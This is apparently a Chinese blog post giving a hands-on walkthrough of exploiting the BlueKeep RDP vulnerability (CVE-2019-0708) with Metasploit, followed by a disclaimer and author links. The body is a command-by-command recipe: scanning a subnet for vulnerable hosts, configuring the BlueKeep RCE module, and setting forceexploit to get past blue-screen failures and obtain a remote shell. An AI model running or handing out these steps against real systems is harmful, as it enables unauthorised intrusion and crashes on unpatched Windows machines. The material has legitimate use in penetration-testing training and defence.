CVE-2019-0708漏洞实战

使用命令:search 0708搜索exp脚本

搜索网段中主机漏洞

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

照例,show options 看一下配置

设置网段set RHOSTS x.x.x.x

run运行就行了

使用攻击模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

查看所需要的配置show options

可以看到主要设置的参数有RHOSTS / RPORT / target
查看要配置的目标show targets

设置参数

设置关键选项RHOSTS/RPORT/TARGET

set RHOSTS x.x.x.x

set RPORT 3389

set target 4

开始攻击输入run

虽然显示目标存在可利用点,且攻击也已经完成,但是最终并没有按照预定计划创建会话返回shell,这样的攻击只是将靶机打蓝屏,并没有成功实现getshell执行任意代码的目的

解决蓝屏的问题

为什么会出现蓝屏,可能是因为内核不兼容或者返回的内存不对所造成的,这种exp还不稳定。

重新开始,前几步同上,之后开始修改(这个很不稳定,成功与否看运气)

set RHOSTS x.x.x.x

set forceexploit true

set target 4

run之后成功建立连接,获取到shell

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

bash 复制代码
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
相关推荐
南城花随雪。4 分钟前
硬盘(HDD)与固态硬盘(SSD)详细解读
数据库
儿时可乖了5 分钟前
使用 Java 操作 SQLite 数据库
java·数据库·sqlite
懒是一种态度7 分钟前
Golang 调用 mongodb 的函数
数据库·mongodb·golang
天海华兮10 分钟前
mysql 去重 补全 取出重复 变量 函数 和存储过程
数据库·mysql
gma9991 小时前
Etcd 框架
数据库·etcd
爱吃青椒不爱吃西红柿‍️1 小时前
华为ASP与CSP是什么?
服务器·前端·数据库
Yz98762 小时前
hive的存储格式
大数据·数据库·数据仓库·hive·hadoop·数据库开发
武子康2 小时前
大数据-230 离线数仓 - ODS层的构建 Hive处理 UDF 与 SerDe 处理 与 当前总结
java·大数据·数据仓库·hive·hadoop·sql·hdfs
苏-言2 小时前
Spring IOC实战指南:从零到一的构建过程
java·数据库·spring
Ljw...2 小时前
索引(MySQL)
数据库·mysql·索引